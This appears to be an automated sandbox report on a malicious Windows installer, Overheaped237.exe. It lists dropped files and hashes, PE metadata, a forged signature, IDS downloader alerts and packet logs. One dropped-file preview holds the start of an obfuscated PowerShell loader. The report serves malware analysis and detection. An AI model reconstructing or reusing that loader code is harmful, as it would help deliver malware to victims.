Joe Sandbox View:	Filename: 66776676676.exe, Detection: malicious, Browse Filename: anziOUzZJs.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Program.Unwanted.1283.21599.30651.exe, Detection: malicious, Browse Filename: PTFE Coated Butterfly Valve Picture#U00b7pdf.exe, Detection: malicious, Browse Filename: cuenta iban-ES65.exe, Detection: malicious, Browse Filename: cuenta iban-ES65.exe, Detection: malicious, Browse Filename: cuenta iban-ES65.exe, Detection: malicious, Browse Filename: cuenta iban-ES65.exe, Detection: malicious, Browse Filename: rResegregation.exe, Detection: malicious, Browse Filename: rResegregation.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L...rc.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253\Ekstensives.Bnd

Download File

Process:	C:\Users\user\Desktop\Overheaped237.exe
File Type:	Unicode text, UTF-8 text, with very long lines (4135), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	70523
Entropy (8bit):	5.198203677378177
Encrypted:	false
SSDEEP:	1536:mE+A9CauLBT0eX1ckLgXDyn6RK0Tk4f7J:mE+A9CjLBT0C2kce2
MD5:	C218052AB259497819CFE121DB3E7483
SHA1:	FF3D7204DD2D9AA1A590132DB4E347D2DB7AF7C3
SHA-256:	0E4B16FA84AD77589A294A9A4D9BFD243EECCF6A2BE6975E2122B3537A7E1CF6
SHA-512:	73704852648A92E92EE0BE371C463F6C4BA41C15F1E043E5B43D7C1D55771B64488A15BCF9F3A2316A5D2746908B75DD542D417D935660AB5694C97F38027AF9
Malicious:	true
Preview:	$Hengaaedesevgelseshmmedes=$Deklineringernes;........$Skaalet = @'.Tox col.Archsed$PelargoDFallos.eNyserprlKultur.areferennDjelfa dbehedgeeb,rbedws niform=Gyrocom$ Pi.erfP Secti rKol egieS imsksc krbugsoSheephenA teralc uestimeSemibioiM teorivJivaroai Korr.mntrskrergRe.nspe;Aflives.BarikadfOp.sthouElephann Se.agecEjendomtV rsfodiDereferoOverthrnIndkbsv .pparaHNeur meoDelocalrShort,ntSalarylekttersknOprids.s lintifi ImmutaaRedire eScorpionBrandsi Tara t(Turbopr$Muler aD nedskrdfrugivogCongaeraGuldlsrn Kejtetg Rime eeElekt.inConnerssMixo og, Imbitt$Ti byggHDeklaraeSnrelidn VampshgFgternea Udstraaprdikate Resi td.areggaeFir allsMorgner)Szo elk Inhuman{Affreig.Bargell.bkkener$ klbestL SekundaAfvasknr F.eksinAfhjemlapedi ul Clinoax(HviskesO VariervTrrest ePlagiarrSemiswebUduel.geVeneti aAccelertReproa. Rabarbe'UndefenQ StandauO varmiesveriges Fe.lmetDomfldeiValideroLa.dstr$AndenhaMallowandKu enike at.mprrRestret poetizaeLrredskr WaterfDPejsensHIndramnyGennemtdTidkortr DisconoDoom ulpCo t

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253\Udfring53.lev

Download File

Process:	C:\Users\user\Desktop\Overheaped237.exe
File Type:	data
Category:	dropped
Size (bytes):	1592092
Entropy (8bit):	0.15888263670695008
Encrypted:	false
SSDEEP:	768:soeSIeBIi+CIHPx0zCnX4uXSmBKjtdYKffNFYu5bA+KNiyvYFxUT:G
MD5:	B4834640DF9710A3741E667024766F83
SHA1:	B392E116F95A0388B7D82C7BD453FD4B3AABE9B6
SHA-256:	9091FB5A1B166D03C61848505A440E8B33ACA701DE691D7E4EB8FBFE7379FCAF
SHA-512:	76396F26F236DE394EE3C2441073BF59107F61393E87D730CC70E989582361AACDAEA20E59EA49CC0F125FA6A8405823B17A5D24EC111391E83647FC3687F48C
Malicious:	false
Preview:	.s...................W.....................................................................................0.......................................................................................................................................................................................................~..........................................................................................................................................................................................................................................................................................................................................................2...........................................................................................j.............................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253\Ungallantness.kok

Download File

Process:	C:\Users\user\Desktop\Overheaped237.exe
File Type:	data
Category:	dropped
Size (bytes):	805283
Entropy (8bit):	0.1589716616809398
Encrypted:	false
SSDEEP:	768:nHrNCx0tE2B2CS9/Nq7r2Cr5WHOKjzQT:rt
MD5:	5ACF4982DBF490AD4AE83C7D1856E89C
SHA1:	66FE8A2B3323ED8CF74FBF6C681D0AA3496A6185
SHA-256:	9F10026E2214CA3C9C59A9AF9913C2EF9C01AC32EFB3A7DB3A2BEC568809904C
SHA-512:	B1BFB5A4FA9B1B7841254161F9347ADC44E3269D13AB7E703A2EC009B95844442E66312436835185E7779673C2E5553659BD85F4B141E5CF907EEE9198EC1F82
Malicious:	false
Preview:	...........................................................................................................................................................................................................................................................................................................................................................................J........\........................................................................................................................................................................................................................................................J..................................................................................M.................c.....................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253\Uplejedes.Ile

Download File

Process:	C:\Users\user\Desktop\Overheaped237.exe
File Type:	data
Category:	dropped
Size (bytes):	360530
Entropy (8bit):	7.606644567321406
Encrypted:	false
SSDEEP:	6144:gkhngsOoUfdBkYM1UE+mE1/jBSq982t7r14zSMV3KqgLbhr340Pf:gongzzfdmYMKE+bjIR2tKz5UqgLbXf
MD5:	0B6F4D48E7517E011D43644F2F7F6F14
SHA1:	C97BF2F3FB0617A951E2D1757E086F642BBD7CB7
SHA-256:	BFD1A80E5FB97D60CF6AEA256EF9A178406F557B413CE561084F8535D02CD6D2
SHA-512:	B419289EB4E56556A9C2F0C2ABF7574F9CB811EADC772E33548CEC8D7D76708EE01BD32DBE63DDC5719D3F070FD54457317C3DC4AD9B46D094F20197C7B6545C
Malicious:	false
Preview:	...YY......5.999......$$..................................>>........U...####..OOOOOO......................I..........j...s........f....=....M......4.....zz....................~.QQQQQ...ee.............TT...............''....!.++..............BB.B.....,,..............**...w.........44...PPP.....f..). ....[[.........ss.@@.......................[.......RRR.FFF........xx.................@..p...............88........%..........v.......hh.............)))................bbbbbb...8.hh.....XX........................u....zz....BB.........--...................44..........................ffff.....II.........HHH........l.........A.........}.000...(..........'.............................=..@@@.................>.&.......s.........l..uu...................EEEE.......................!!!!......2.......a...........................!!!!!!!...........@@...............F..................j...__.................,,..........NNN.#..<.jj.......Z................./.................BB.[[[.......... ..1.N..`.........

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253\Yaply50.txt

Download File

Process:	C:\Users\user\Desktop\Overheaped237.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	395
Entropy (8bit):	4.303174937960327
Encrypted:	false
SSDEEP:	12:JgWpd0rRenzLLJBl8PjZQbFXEExWTCD/u:SWcrknXlKjZA2ENDm
MD5:	C271D6423649C301105C8A2ECA25F9E4
SHA1:	CFAC3739C43482547D096C88670FA646FB62A56C
SHA-256:	E58319C2FCC8C30C70969BED761493AFD5B7F29D12FDBD1D96C0BBD93EFC6DB2
SHA-512:	B04BBDBA8AFB3D93D6E10C9EA838EC3B2D3798CB0F8C383C44329FA35B4F6E72B4023FB1A6ADAFE49AF258CD876A5BB0A019C742353936EB6C60601937EAF04D
Malicious:	false
Preview:	crioceras shepard vildfarelserne,lg udgangsvrdiers alkaloids misaimed rabiat skihejsers seashine,impeccancy brndbarestes maskalonges strandvaskers forsikringsaftalelov sportsvognes mirlitons studieegnethedens fontina sprawled..assiento iodizing ferslevs blowbacks mementoernes sinicizing ahura zonal nedkradsende omtydet..spermatin predisable sulphureity.autofermentation symbolry recepturerets,

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253\rancheria.pro

Download File

Process:	C:\Users\user\Desktop\Overheaped237.exe
File Type:	data
Category:	dropped
Size (bytes):	947949
Entropy (8bit):	0.15996398773946943
Encrypted:	false
SSDEEP:	768:oASe3amtYNbHv0lnDzgcAUOkEuypx/zSFad:
MD5:	B34FC802327D0F5F02281FD236BD67C6
SHA1:	E7E1E1E5288F16B42FB8B5A62C9B33A4B8D02341
SHA-256:	1B795733FFC880D3DECD0A23BD3CCB22AC6A80EEA5729D407336D891F0523884
SHA-512:	DD170F304175543B07EABE1F09D0548DBE9C332074A0493D1BC4400494356104E16D47C684EB04A04447283427612B1EAE5C40BBB42E087F77FE72C841B9DB7B
Malicious:	false
Preview:	..........................................................................................................................................................................................................e..................................................................................................................................................................................................................................................................... ...............................................................................................)......................................................................K...............'................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.7494855337327495
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Overheaped237.exe
File size:	587'656 bytes
MD5:	8f4adfd3b8c55670a99389ba3905e43d
SHA1:	24e4a66a55b65fe58933ac92b161befc5c5df977
SHA256:	8126f3d67e43f2c93f178b68cc6a791a61c7f4f986cd5fb0d213780c4aa8e2d4
SHA512:	9ddc6fb7d8f92d4ad22e1842704dfd8cad0184f86c9482fb2cbc051008a46bb87449c8abba66b4179fc602978c31ea9215cd070c7008e39f71b6d24a43c3c527
SSDEEP:	12288:d93jliesAP5dtwQYYy016wq2FFbyADqbM5LugDkzicmrdZNf:d93jliR4jasy01DHn+AWYROicudZNf
TLSH:	E5C4E094B9664925C29E0534A2A3351DC67C9FD622E2D012FB287E33F935BEDAF40743
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F...v...F...@...F.Rich..F.........................PE..L....c.W.................^.........

File Icon


Icon Hash:	1956767870707155

Static PE Info

General

Entrypoint:	0x40322b
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x57956393 [Mon Jul 25 00:55:47 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	4f67aeda01a0484282e8c59006b0b352

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Partils, E=Tthedsfunktionerne@batikfarve.Fo, O=Partils, L=Paris 02, OU="Breastplate Candlewicks Miljforbrydelsens ", S=\xcele-de-France, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	30/12/2023 06:00:09 29/12/2024 06:00:09
Subject Chain	CN=Partils, E=Tthedsfunktionerne@batikfarve.Fo, O=Partils, L=Paris 02, OU="Breastplate Candlewicks Miljforbrydelsens ", S=\xcele-de-France, C=FR
Version:	3
Thumbprint MD5:	0C624DBAEF050994E32C67887397251E
Thumbprint SHA-1:	5174D08A2E62BE50AEFCA8A7741D65B4B717C98E
Thumbprint SHA-256:	995B3FC63FC8191D0CE368AF8C30F83EBD9C6FA52F16AA8A80E12CD900A2A3C5
Serial:	08B80B0B0598D2B35EA3E9891D522FBE907367D0

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409130h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407120h]
call dword ptr [004070ACh]
cmp ax, 00000006h
je 00007F0C01386B33h
push ebx
call 00007F0C01389AB9h
cmp eax, ebx
je 00007F0C01386B29h
push 00000C00h
call eax
mov esi, 00407298h
push esi
call 00007F0C01389A35h
push esi
call dword ptr [004070A8h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F0C01386B0Dh
push ebp
push 00000009h
call 00007F0C01389A8Ch
push 00000007h
call 00007F0C01389A85h
mov dword ptr [00423724h], eax
call dword ptr [00407044h]
push ebx
call dword ptr [00407288h]
mov dword ptr [004237D8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041ECF0h
call dword ptr [00407174h]
push 004091ECh
push 00422F20h
call 00007F0C013896AFh
call dword ptr [004070A4h]
mov ebp, 00429000h
push eax
push ebp
call 00007F0C0138969Dh
push ebx
call dword ptr [00407154h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7428	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x38000	0x1bec0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x8f018	0x770
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5dc5	0x5e00	566b191b40fde4369ae73a05b57df1d2	False	0.6685089760638298	data	6.47110609300208	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1246	0x1400	6389f916226544852e494114faf192ad	False	0.4271484375	data	5.0003960999706765	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1a818	0x400	72dcd89e8824ae186467be61797ed81e	False	0.6474609375	data	5.220595003364983	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x24000	0x14000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x38000	0x1bec0	0x1c000	3d561cd710712943d7c2ece81602a3e4	False	0.42149135044642855	data	5.782312893766128	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x382f8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 0	English	United States	0.1945019519697149
RT_ICON	0x48b20	0x65dd	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9937109330060974
RT_ICON	0x4f100	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.35518672199170126
RT_ICON	0x516a8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States	0.43363039399624764
RT_ICON	0x52750	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	English	United States	0.5209016393442623
RT_ICON	0x530d8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States	0.62677304964539
RT_DIALOG	0x53540	0x100	data	English	United States	0.5234375
RT_DIALOG	0x53640	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x53760	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x53828	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x53888	0x5a	data	English	United States	0.7888888888888889
RT_VERSION	0x538e8	0x294	OpenPGP Secret Key	English	United States	0.5242424242424243
RT_MANIFEST	0x53b80	0x33d	XML 1.0 document, ASCII text, with very long lines (829), with no line terminators	English	United States	0.5536791314837153

Imports

DLL	Import
KERNEL32.dll	CopyFileA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetFileAttributesA, SetFileAttributesA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, GetCurrentProcess, GetFullPathNameA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, lstrcpynA, SetErrorMode, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
USER32.dll	ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-19T10:29:54.327758+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49710	216.58.208.238	443	TCP
2024-12-19T10:30:12.683010+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49712	158.101.44.242	80	TCP
2024-12-19T10:30:18.120569+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49712	158.101.44.242	80	TCP
2024-12-19T10:30:19.735953+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49714	104.21.67.152	443	TCP
2024-12-19T10:30:22.058136+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49715	158.101.44.242	80	TCP
2024-12-19T10:30:23.921941+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49716	104.21.67.152	443	TCP
2024-12-19T10:30:26.956409+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49718	104.21.67.152	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 19, 2024 10:29:51.716641903 CET	49710	443	192.168.2.7	216.58.208.238
Dec 19, 2024 10:29:51.716695070 CET	443	49710	216.58.208.238	192.168.2.7
Dec 19, 2024 10:29:51.716818094 CET	49710	443	192.168.2.7	216.58.208.238
Dec 19, 2024 10:29:51.729465008 CET	49710	443	192.168.2.7	216.58.208.238
Dec 19, 2024 10:29:51.729482889 CET	443	49710	216.58.208.238	192.168.2.7
Dec 19, 2024 10:29:53.428266048 CET	443	49710	216.58.208.238	192.168.2.7
Dec 19, 2024 10:29:53.428508043 CET	49710	443	192.168.2.7	216.58.208.238
Dec 19, 2024 10:29:53.429061890 CET	443	49710	216.58.208.238	192.168.2.7
Dec 19, 2024 10:29:53.429126024 CET	49710	443	192.168.2.7	216.58.208.238
Dec 19, 2024 10:29:53.500886917 CET	49710	443	192.168.2.7	216.58.208.238
Dec 19, 2024 10:29:53.500921011 CET	443	49710	216.58.208.238	192.168.2.7
Dec 19, 2024 10:29:53.501332998 CET	443	49710	216.58.208.238	192.168.2.7
Dec 19, 2024 10:29:53.501513004 CET	49710	443	192.168.2.7	216.58.208.238
Dec 19, 2024 10:29:53.504931927 CET	49710	443	192.168.2.7	216.58.208.238
Dec 19, 2024 10:29:53.547370911 CET	443	49710	216.58.208.238	192.168.2.7
Dec 19, 2024 10:29:54.327743053 CET	443	49710	216.58.208.238	192.168.2.7
Dec 19, 2024 10:29:54.327864885 CET	49710	443	192.168.2.7	216.58.208.238
Dec 19, 2024 10:29:54.328052044 CET	49710	443	192.168.2.7	216.58.208.238
Dec 19, 2024 10:29:54.328103065 CET	443	49710	216.58.208.238	192.168.2.7
Dec 19, 2024 10:29:54.328294992 CET	443	49710	216.58.208.238	192.168.2.7
Dec 19, 2024 10:29:54.328357935 CET	49710	443	192.168.2.7	216.58.208.238
Dec 19, 2024 10:29:54.328372955 CET	49710	443	192.168.2.7	216.58.208.238
Dec 19, 2024 10:29:54.522603035 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:54.522636890 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:54.522712946 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:54.523736000 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:54.523755074 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:56.228460073 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:56.228701115 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:56.236757994 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:56.236785889 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:56.237195969 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:56.237276077 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:56.237880945 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:56.283339024 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.161967039 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.162137985 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.174989939 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.175072908 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.280687094 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.280811071 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.280832052 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.280884981 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.285095930 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.285197973 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.353473902 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.353588104 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.357223034 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.357428074 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.357440948 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.357502937 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.363171101 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.363240957 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.370922089 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.370991945 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.372370958 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.372436047 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.380074978 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.380172968 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.383434057 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.383507967 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.389367104 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.389436960 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.397459984 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.397567987 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.400984049 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.401053905 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.410917997 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.410991907 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.413904905 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.413971901 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.424436092 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.424520969 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.427491903 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.427561998 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.438168049 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.438247919 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.441220045 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.441284895 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.451841116 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.451905012 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.454922915 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.455014944 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.465521097 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.465598106 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.468514919 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.468636990 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.479413033 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.479487896 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.479615927 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.479680061 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.493074894 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.493189096 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.512448072 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.512521029 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.512602091 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.512662888 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.545272112 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.545341969 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.545382023 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.545439959 CET	49711	443	192.168.2.7	172.217.17.65
